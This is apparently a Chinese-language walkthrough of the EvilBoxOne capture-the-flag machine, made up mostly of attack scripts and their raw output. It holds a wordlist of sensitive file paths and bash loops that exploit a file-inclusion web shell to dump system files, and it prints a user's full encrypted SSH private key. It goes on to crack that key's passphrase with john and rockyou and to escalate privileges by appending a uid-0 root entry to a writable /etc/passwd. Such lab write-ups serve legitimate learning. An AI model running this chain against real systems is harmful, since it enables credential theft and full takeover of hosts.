/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_logerror_log.old
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/php.ini
/usr/local/httpd/conf/httpd.conf
/usr/local/httpd2.2/htdocs/index.html
/usr/local/httpd2.2/htdocs/index.php
/usr/local/lib/php.ini
/usr/local/mysql/bin/mysql
/usr/local/mysql/my.cnf
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/php5.ini
/usr/local/share/examples/php/php.ini
/usr/local/share/examples/php4/php.ini
/usr/local/tomcat5527/bin/version.sh
/usr/local/Zend/etc/php.ini
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
/var/apache2/config.inc
/var/httpd/conf/httpd.conf
/var/httpd/conf/php.ini
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.html
/var/httpd/htdocs/index.php
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/httpd.conf
/var/local/www/conf/php.ini
/var/log/access.log
/var/log/access_log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/error.log
/var/log/error_log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqlderror.log
/var/mail/root
/var/mysql.log
/var/spool/cron/crontabs/root
/var/spool/mail/root
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/www/htdocs/index.php
/var/www/index.html
/var/www/index.php
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
/web/conf/php.ini
/www/conf/httpd.conf
/www/htdocs/index.html
/www/htdocs/index.php
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
root/.ssh/authorized_keys
root/.ssh/identity
root/.ssh/identity.pub
root/.ssh/id_dsa
root/.ssh/id_dsa.pub
root/.ssh/id_rsa
root/.ssh/id_rsa.pub

for i in $(cat ./file.txt)
do
	echo "#######################"
	echo ">>>$i:"
	curl "http://192.168.56.105/secret/evil.php?command=$i" -m 1 -s
	sleep 1
done

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ./s.sh  
################################################
>>>/apache/apache/conf/httpd.conf:
################################################
>>>/apache/apache2/conf/httpd.conf:
################################################
>>>/apache/php/php.ini:
################################################
>>>/bin/php.ini:
################################################
>>>/etc/anacrontab:
################################################
>>>/etc/apache/apache.conf:
################################################
>>>/etc/apache/httpd.conf:
################################################
>>>/etc/apache2/apache.conf:
################################################
>>>/etc/apache2/httpd.conf:
################################################
>>>/etc/apache2/sites-available/default:
################################################
>>>/etc/apache2/vhosts.d/00_default_vhost.conf:
################################################
>>>/etc/at.allow:
################################################
>>>/etc/at.deny:
################################################
>>>/etc/cron.allow:
################################################
>>>/etc/cron.deny:
################################################
>>>/etc/crontab:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
################################################
>>>/etc/fstab:
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point>   <type>  <options>       <dump>  <pass>
# / was on /dev/sda1 during installation
UUID=d0c20a19-945b-4f91-8ea2-8466c005b946 /               ext4    errors=remount-ro 0       1
# swap was on /dev/sda5 during installation
UUID=635c225b-1f26-4d4e-912a-87db360ddbb1 none            swap    sw              0       0
/dev/sr0        /media/cdrom0   udf,iso9660 user,noauto     0       0
################################################
>>>/etc/host.conf:
multi on
################################################
>>>/etc/httpd/conf.d/httpd.conf:
################################################
>>>/etc/httpd/conf.d/php.conf:
################################################
>>>/etc/httpd/conf/httpd.conf:
################################################
>>>/etc/httpd/htdocs/index.html:
################################################
>>>/etc/httpd/htdocs/index.php:
################################################
>>>/etc/httpd/logs/access.log:
################################################
>>>/etc/httpd/logs/access_log:
################################################
>>>/etc/httpd/logs/error.log:
################################################
>>>/etc/httpd/logs/error_log:
################################################
>>>/etc/httpd/php.ini:
################################################
>>>/etc/init.d/httpd:
################################################
>>>/etc/init.d/mysql:
################################################
>>>/etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf

################################################
>>>/etc/motd:
################################################
>>>/etc/my.cnf:
################################################
>>>/etc/mysql/my.cnf:
################################################
>>>/etc/mysql/my.cnf:
################################################
>>>/etc/network/interfaces:
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
allow-hotplug enp0s3
iface enp0s3 inet dhcp
################################################
>>>/etc/networks:
default         0.0.0.0
loopback        127.0.0.0
link-local      169.254.0.0

################################################
>>>/etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
################################################
>>>/etc/php.ini:
################################################
>>>/etc/php/apache/php.ini:
################################################
>>>/etc/php/apache2/php.ini:
################################################
>>>/etc/php/cgi/php.ini:
################################################
>>>/etc/php/php.ini:
################################################
>>>/etc/php/php4/php.ini:
################################################
>>>/etc/php4.4/fcgi/php.ini:
################################################
>>>/etc/php4/apache/php.ini:
################################################
>>>/etc/php4/apache2/php.ini:
################################################
>>>/etc/php4/cgi/php.ini:
################################################
>>>/etc/php5/apache/php.ini:
################################################
>>>/etc/php5/apache2/php.ini:
################################################
>>>/etc/php5/cgi/php.ini:
################################################
>>>/etc/phpmyadmin/config.inc.php:
################################################
>>>/etc/resolv.conf:
domain home
search home
nameserver 192.168.1.1
################################################
>>>/etc/shadow:
################################################
>>>/etc/ssh/sshd_config:
#       $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# Expect .ssh/authorized_keys2 to be disregarded by default in future.
#AuthorizedKeysFile     .ssh/authorized_keys .ssh/authorized_keys2

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
PrintLastLog no
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

# override default of no subsystems
Subsystem       sftp    /usr/lib/openssh/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding no
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server
################################################
>>>/etc/ssh/ssh_config:

# This is the ssh client system-wide configuration file.  See
# ssh_config(5) for more information.  This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.

# Configuration data is parsed as follows:
#  1. command line options
#  2. user-specific file
#  3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.

# Site-wide defaults for some commonly used options.  For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.

Host *
#   ForwardAgent no
#   ForwardX11 no
#   ForwardX11Trusted yes
#   PasswordAuthentication yes
#   HostbasedAuthentication no
#   GSSAPIAuthentication no
#   GSSAPIDelegateCredentials no
#   GSSAPIKeyExchange no
#   GSSAPITrustDNS no
#   BatchMode no
#   CheckHostIP yes
#   AddressFamily any
#   ConnectTimeout 0
#   StrictHostKeyChecking ask
#   IdentityFile ~/.ssh/id_rsa
#   IdentityFile ~/.ssh/id_dsa
#   IdentityFile ~/.ssh/id_ecdsa
#   IdentityFile ~/.ssh/id_ed25519
#   Port 22
#   Protocol 2
#   Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc
#   MACs hmac-md5,hmac-sha1,umac-64@openssh.com
#   EscapeChar ~
#   Tunnel no
#   TunnelDevice any:any
#   PermitLocalCommand no
#   VisualHostKey no
#   ProxyCommand ssh -q -W %h:%p gateway.example.com
#   RekeyLimit 1G 1h
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes
################################################
>>>/etc/ssh/ssh_host_dsa_key:
################################################
>>>/etc/ssh/ssh_host_dsa_key:
################################################
>>>/etc/ssh/ssh_host_dsa_key.pub:
################################################
>>>/etc/ssh/ssh_host_dsa_key.pub:
################################################
>>>/etc/ssh/ssh_host_key:
################################################
>>>/etc/ssh/ssh_host_key:
################################################
>>>/etc/ssh/ssh_host_key.pub:
################################################
>>>/etc/ssh/ssh_host_key.pub:
################################################
>>>/etc/ssh/ssh_host_rsa_key:
################################################
>>>/etc/ssh/ssh_host_rsa_key:
################################################
>>>/etc/ssh/ssh_host_rsa_key.pub:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsg5B3Ae75r4szTNFqG247Ea8vKjxulITlFGE9YEK4KLJA86TskXQn9E24yX4cYMoF0WDn7JD782HfHCrV74r8nU2kVTw5Y8ZRyBEqDwk6vmOzMvq1Kzrcj+i4f17saErC9YVgx5/33e7UkLXt3MYVjVPIekf/sxWxS4b6N0+J1xiISNcoL/kmG3L7McJzX6Qx6cWtauJf3HOxNtZJ94WetHArSpUyIsn83P+Quxa/uaUgGPx4EkHL7Qx3AVIBbKA7uDet/pZUchcPq/4gv25DKJH4XIty+5/yNQo1EMd6Ra5A9SmnhWjSxdFqTGHpdKnyYHr4VeZ7cpvpQnoiV4y9 root@EvilBoxOne
################################################
>>>/etc/ssh/ssh_host_rsa_key.pub:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsg5B3Ae75r4szTNFqG247Ea8vKjxulITlFGE9YEK4KLJA86TskXQn9E24yX4cYMoF0WDn7JD782HfHCrV74r8nU2kVTw5Y8ZRyBEqDwk6vmOzMvq1Kzrcj+i4f17saErC9YVgx5/33e7UkLXt3MYVjVPIekf/sxWxS4b6N0+J1xiISNcoL/kmG3L7McJzX6Qx6cWtauJf3HOxNtZJ94WetHArSpUyIsn83P+Quxa/uaUgGPx4EkHL7Qx3AVIBbKA7uDet/pZUchcPq/4gv25DKJH4XIty+5/yNQo1EMd6Ra5A9SmnhWjSxdFqTGHpdKnyYHr4VeZ7cpvpQnoiV4y9 root@EvilBoxOne
################################################
>>>/etc/sysconfig/network:
################################################
>>>/etc/sysconfig/network:
################################################
>>>/home/apache/conf/httpd.conf:
################################################
>>>/home/apache2/conf/httpd.conf:
################################################
>>>/home/bin/stable/apache/php.ini:
################################################
>>>/home2/bin/stable/apache/php.ini:
################################################
>>>/NetServer/bin/stable/apache/php.ini:
################################################
>>>/opt/www/conf/httpd.conf:
################################################
>>>/opt/www/htdocs/index.html:
################################################
>>>/opt/www/htdocs/index.php:
################################################
>>>/opt/xampp/etc/php.ini:
################################################
>>>/PHP/php.ini:
################################################
>>>/php/php.ini:
################################################
>>>/php4/php.ini:
################################################
>>>/php5/php.ini:
################################################
>>>/root/.atftp_history:
################################################
>>>/root/.bashrc:
################################################
>>>/root/.bash_history:
################################################
>>>/root/.mysql_history:
################################################
>>>/root/.nano_history:
################################################
>>>/root/.php_history:
################################################
>>>/root/.profile:
################################################
>>>/root/.ssh/authorized_keys:
################################################
>>>/root/.ssh/identity:
################################################
>>>/root/.ssh/identity.pub:
################################################
>>>/root/.ssh/id_dsa:
################################################
>>>/root/.ssh/id_dsa.pub:
################################################
>>>/root/.ssh/id_rsa:
################################################
>>>/root/.ssh/id_rsa.pub:
################################################
>>>/root/anaconda-ks.cfg:
################################################
>>>/tmp/apache/htdocs/index.html:
################################################
>>>/tmp/apache/htdocs/index.php:
################################################
>>>/usr/lib/php.ini:
################################################
>>>/usr/lib/php/php.ini:
################################################
>>>/usr/local/apache/conf/httpd.conf:
################################################
>>>/usr/local/apache/conf/php.ini:
################################################
>>>/usr/local/apache/htdocs/index.html:
################################################
>>>/usr/local/apache/htdocs/index.php:
################################################
>>>/usr/local/apache/logs/access.log:
################################################
>>>/usr/local/apache/logs/access_log:
################################################
>>>/usr/local/apache/logs/access_logaccess_log.old:
################################################
>>>/usr/local/apache/logs/error.log:
################################################
>>>/usr/local/apache/logs/error_log:
################################################
>>>/usr/local/apache/logs/error_logerror_log.old:
################################################
>>>/usr/local/apache2/conf/httpd.conf:
################################################
>>>/usr/local/apache2/conf/php.ini:
################################################
>>>/usr/local/apache2/htdocs/index.html:
################################################
>>>/usr/local/apache2/htdocs/index.php:
################################################
>>>/usr/local/cpanel/logs:
################################################
>>>/usr/local/cpanel/logs/access_log:
################################################
>>>/usr/local/cpanel/logs/error_log:
################################################
>>>/usr/local/cpanel/logs/license_log:
################################################
>>>/usr/local/cpanel/logs/login_log:
################################################
>>>/usr/local/cpanel/logs/stats_log:
################################################
>>>/usr/local/cpanel/logs/stats_log:
################################################
>>>/usr/local/etc/php.ini:
################################################
>>>/usr/local/httpd/conf/httpd.conf:
################################################
>>>/usr/local/httpd2.2/htdocs/index.html:
################################################
>>>/usr/local/httpd2.2/htdocs/index.php:
################################################
>>>/usr/local/lib/php.ini:
################################################
>>>/usr/local/mysql/bin/mysql:
################################################
>>>/usr/local/mysql/my.cnf:
################################################
>>>/usr/local/php/lib/php.ini:
################################################
>>>/usr/local/php4/lib/php.ini:
################################################
>>>/usr/local/php4/lib/php.ini:
################################################
>>>/usr/local/php4/php.ini:
################################################
>>>/usr/local/php5/etc/php.ini:
################################################
>>>/usr/local/php5/lib/php.ini:
################################################
>>>/usr/local/php5/php5.ini:
################################################
>>>/usr/local/share/examples/php/php.ini:
################################################
>>>/usr/local/share/examples/php4/php.ini:
################################################
>>>/usr/local/tomcat5527/bin/version.sh:
################################################
>>>/usr/local/Zend/etc/php.ini:
################################################
>>>/usr/share/tomcat6/bin/startup.sh:
################################################
>>>/usr/tomcat6/bin/startup.sh:
################################################
>>>/var/apache2/config.inc:
################################################
>>>/var/httpd/conf/httpd.conf:
################################################
>>>/var/httpd/conf/php.ini:
################################################
>>>/var/httpd/conf/php.ini:
################################################
>>>/var/httpd/htdocs/index.html:
################################################
>>>/var/httpd/htdocs/index.php:
################################################
>>>/var/lib/mysql/my.cnf:
################################################
>>>/var/lib/mysql/mysql/user.MYD:
################################################
>>>/var/local/www/conf/httpd.conf:
################################################
>>>/var/local/www/conf/php.ini:
################################################
>>>/var/log/access.log:
################################################
>>>/var/log/access_log:
################################################
>>>/var/log/apache/access.log:
################################################
>>>/var/log/apache/access_log:
################################################
>>>/var/log/apache/error.log:
################################################
>>>/var/log/apache/error_log:
################################################
>>>/var/log/apache2/access.log:
################################################
>>>/var/log/apache2/access_log:
################################################
>>>/var/log/apache2/error.log:
################################################
>>>/var/log/apache2/error_log:
################################################
>>>/var/log/error.log:
################################################
>>>/var/log/error_log:
################################################
>>>/var/log/mysql.log:
################################################
>>>/var/log/mysql/mysql-bin.log:
################################################
>>>/var/log/mysql/mysql-slow.log:
################################################
>>>/var/log/mysql/mysql.log:
################################################
>>>/var/log/mysqlderror.log:
################################################
>>>/var/mail/root:
################################################
>>>/var/mysql.log:
################################################
>>>/var/spool/cron/crontabs/root:
################################################
>>>/var/spool/mail/root:
################################################
>>>/var/www/conf/httpd.conf:
################################################
>>>/var/www/htdocs/index.html:
################################################
>>>/var/www/htdocs/index.php:
################################################
>>>/var/www/index.html:
################################################
>>>/var/www/index.php:
################################################
>>>/var/www/logs/access.log:
################################################
>>>/var/www/logs/access_log:
################################################
>>>/var/www/logs/error.log:
################################################
>>>/var/www/logs/error_log:
################################################
>>>/web/conf/php.ini:
################################################
>>>/www/conf/httpd.conf:
################################################
>>>/www/htdocs/index.html:
################################################
>>>/www/htdocs/index.php:
################################################
>>>/www/php/php.ini:
################################################
>>>/www/php4/php.ini:
################################################
>>>/www/php5/php.ini:
################################################
>>>/xampp/apache/bin/php.ini:
################################################
>>>/xampp/apache/conf/httpd.conf:
################################################
>>>root/.ssh/authorized_keys:
################################################
>>>root/.ssh/identity:
################################################
>>>root/.ssh/identity.pub:
################################################
>>>root/.ssh/id_dsa:
################################################
>>>root/.ssh/id_dsa.pub:
################################################
>>>root/.ssh/id_rsa:
################################################
>>>root/.ssh/id_rsa.pub:

copy blog

下面是中奖内容：

/etc/crontab 内容是默认
/etc/fstab 内容是默认
/etc/host.conf 内容是默认
/etc/ld.so.conf 内容是默认
/etc/network/interfaces 内容是默认
/etc/networks 无用
/etc/passwd
/etc/resolv.conf 无用
/etc/ssh/sshd_config 内容是默认
/etc/ssh/ssh_config 内容是默认
/etc/ssh/ssh_host_rsa_key.pub

新的细节发现

/etc/passwd
- 我们知道还存在一个名为 mowree 的用户
/etc/ssh/ssh_host_rsa_key.pub
- ssh 登录线索，并且登录指向 root@EvilBoxOne

ssh_dict.txt

/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/ssh_host_dsa_key
/root/.ssh/ssh_host_dsa_key.pub
/root/.ssh/ssh_host_key
/root/.ssh/ssh_host_key.pub
/root/.ssh/ssh_host_rsa_key
/root/.ssh/ssh_host_rsa_key.pub
/home/mowree/.ssh/authorized_keys
/home/mowree/.ssh/identity
/home/mowree/.ssh/identity.pub
/home/mowree/.ssh/id_dsa
/home/mowree/.ssh/id_dsa.pub
/home/mowree/.ssh/id_rsa
/home/mowree/.ssh/id_rsa.pub
/home/mowree/.ssh/ssh_host_dsa_key
/home/mowree/.ssh/ssh_host_dsa_key.pub
/home/mowree/.ssh/ssh_host_key
/home/mowree/.ssh/ssh_host_key.pub
/home/mowree/.ssh/ssh_host_rsa_key
/home/mowree/.ssh/ssh_host_rsa_key.pub

攻击脚本

for i in $(cat ./ssh_dict.txt);
do
	echo "###################################"
	echo ">>>$i:";
	curl "http://192.168.56.105/secret/evil.php?command=$i" -m 1 -s
	sleep 0.5
done

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ./s2.sh                                                                                
###################################
>>>/root/.ssh/authorized_keys:
###################################
>>>/root/.ssh/identity:
###################################
>>>/root/.ssh/identity.pub:
###################################
>>>/root/.ssh/id_dsa:
###################################
>>>/root/.ssh/id_dsa.pub:
###################################
>>>/root/.ssh/id_rsa:
###################################
>>>/root/.ssh/id_rsa.pub:
###################################
>>>/root/.ssh/ssh_host_dsa_key:
###################################
>>>/root/.ssh/ssh_host_dsa_key.pub:
###################################
>>>/root/.ssh/ssh_host_key:
###################################
>>>/root/.ssh/ssh_host_key.pub:
###################################
>>>/root/.ssh/ssh_host_rsa_key:
###################################
>>>/root/.ssh/ssh_host_rsa_key.pub:
###################################
>>>/home/mowree/.ssh/authorized_keys:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne
###################################
>>>/home/mowree/.ssh/identity:
###################################
>>>/home/mowree/.ssh/identity.pub:
###################################
>>>/home/mowree/.ssh/id_dsa:
###################################
>>>/home/mowree/.ssh/id_dsa.pub:
###################################
>>>/home/mowree/.ssh/id_rsa:
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
###################################
>>>/home/mowree/.ssh/id_rsa.pub:
###################################
>>>/home/mowree/.ssh/ssh_host_dsa_key:
###################################
>>>/home/mowree/.ssh/ssh_host_dsa_key.pub:
###################################
>>>/home/mowree/.ssh/ssh_host_key:
###################################
>>>/home/mowree/.ssh/ssh_host_key.pub:
###################################
>>>/home/mowree/.ssh/ssh_host_rsa_key:
###################################
>>>/home/mowree/.ssh/ssh_host_rsa_key.pub:

1	touch id_rsa && curl "http://192.168.56.105/secret/evil.php?command=/home/mowree/.ssh/id_rsa" -m 1 -s > id_rsa && chmod 600 id_rsa

1	ssh mowree@192.168.56.105 -i id_rsa

1	/usr/share/john/ssh2john.py ./id_rsa > ./hash_id_rsa

1	sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

1	john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt

提权法一：

查看我们具有写权限的隐秘文件是否存在

1	find / -writable 2>/dev/null \| grep 'etc'

┌──(root㉿kali)-[/]
└─# openssl passwd -1
Password: 
Verifying - Password: 
$1$MIFi7ZAo$H1NkTSlUggj5ZbYSw5H9x.

1	echo 'root:$1$MIFi7ZAo$H1NkTSlUggj5ZbYSw5H9x.:0:0::/root:/bin/bash' >> /etc/passwd

┌──(root㉿kali)-[/]
└─# openssl passwd -1 -salt jere
Password: 
$1$jere$pGQGlxgnH.no4.Pphez9o1

